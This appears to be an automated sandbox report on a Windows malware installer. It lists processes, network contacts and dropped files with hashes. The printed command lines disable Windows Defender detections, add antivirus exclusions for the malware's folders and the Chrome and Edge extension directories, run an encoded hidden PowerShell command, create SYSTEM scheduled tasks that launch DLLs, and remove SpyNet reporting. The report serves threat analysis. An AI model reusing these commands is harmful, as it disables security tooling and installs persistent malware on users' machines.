"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtgjXOQTh" /SC once /ST 01:14:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtgjXOQTh"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gtgjXOQTh"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 01:38:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe\" UK /xEsite_idZwP 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe UK /xEsite_idZwP 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\YibzXz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\oujrFQM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 02:03:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll\",#1 /mSsite_idmty 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll",#1 /mSsite_idmty 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\RxhBxULV\oWGjdKn.dll",#1 /mSsite_idmty 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 52.111.243.29:443 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 161.111.86.104.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.110.86.104.in-addr.arpa udp
NL 172.217.168.238:443 clients2.google.com tcp
NL 142.251.36.1:443 clients2.googleusercontent.com tcp
NL 172.217.168.238:443 clients2.google.com tcp
US 44.240.147.44:80 api2.check-data.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/1900-16-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/1028-25-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpxk20g3.uz5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1028-29-0x0000019F9D6F0000-0x0000019F9D700000-memory.dmp

memory/1028-30-0x0000019F9D6F0000-0x0000019F9D700000-memory.dmp

memory/1028-31-0x0000019F9D6C0000-0x0000019F9D6E2000-memory.dmp

memory/1028-34-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

memory/3848-39-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4416-43-0x00000000733A0000-0x0000000073B51000-memory.dmp

memory/4416-44-0x0000000003F00000-0x0000000003F10000-memory.dmp

memory/4416-42-0x0000000003F10000-0x0000000003F46000-memory.dmp

memory/4416-45-0x0000000003F00000-0x0000000003F10000-memory.dmp

memory/4416-46-0x0000000004580000-0x0000000004BAA000-memory.dmp

memory/4416-47-0x0000000004500000-0x0000000004522000-memory.dmp

memory/4416-48-0x0000000004DE0000-0x0000000004E46000-memory.dmp

memory/4416-49-0x0000000004E50000-0x0000000004EB6000-memory.dmp

memory/4416-58-0x0000000004FC0000-0x0000000005317000-memory.dmp

memory/4416-59-0x00000000053A0000-0x00000000053BE000-memory.dmp

memory/4416-60-0x00000000053D0000-0x000000000541C000-memory.dmp

memory/4416-63-0x00000000733A0000-0x0000000073B51000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5b74da6778ccaa0e1ca4ae7484775943
SHA1 0a2f6f315a0ca1a0366b509aec7b13c606645654
SHA256 172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78
SHA512 20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

memory/1568-65-0x00000000733A0000-0x0000000073B51000-memory.dmp

memory/1568-67-0x0000000003FD0000-0x0000000003FE0000-memory.dmp

memory/1568-66-0x0000000003FD0000-0x0000000003FE0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 540f443743253c03cae56c5c03db2f4a
SHA1 af65c777ac9860d6bb57bc8c277771e3939c8b07
SHA256 7a53b9ba9a49f88a87d9d9a2b34990ecca49354d0505ce1ba91131e4d5b7f10f
SHA512 1d7ba532af1a3f108a2a2c8decbe6566766a639ca5eaa01d924de49b26fbc209312c4b8bb77676ee0c0459f17a74d1ee0f012c4debf35257fa95c99395406a5f

memory/1568-79-0x00000000733A0000-0x0000000073B51000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/4524-84-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

memory/4524-85-0x000001ADF4740000-0x000001ADF4750000-memory.dmp

memory/4524-86-0x000001ADF4740000-0x000001ADF4750000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/4524-96-0x000001ADF4740000-0x000001ADF4750000-memory.dmp

memory/4524-98-0x00007FFFD9BB0000-0x00007FFFDA672000-memory.dmp

memory/2468-103-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/2468-114-0x0000000001EC0000-0x0000000001F45000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 e0ea914d30300388644271a1f9ac3964
SHA1 a22d8dcea434a87d25a600b7d9067e2ece48a43b
SHA256 2b9645c4a721a5d4728c20698d6443506a6d1225a96f3309fa1176ef0fb778bd
SHA512 5d7eba646c91b50cab4ad7600ffcd83f6675404001c9b325a0fdd47579ee23d6e7c071e688d135fc66cbfce33f99c69031b795fecc422d6dcd7efbbc44640584

memory/2468-158-0x0000000003200000-0x0000000003265000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml

MD5 6adbc2e16879244708846617c9a176e6
SHA1 d59ff03c0a281118d143d5215d15a5a90940a2f0
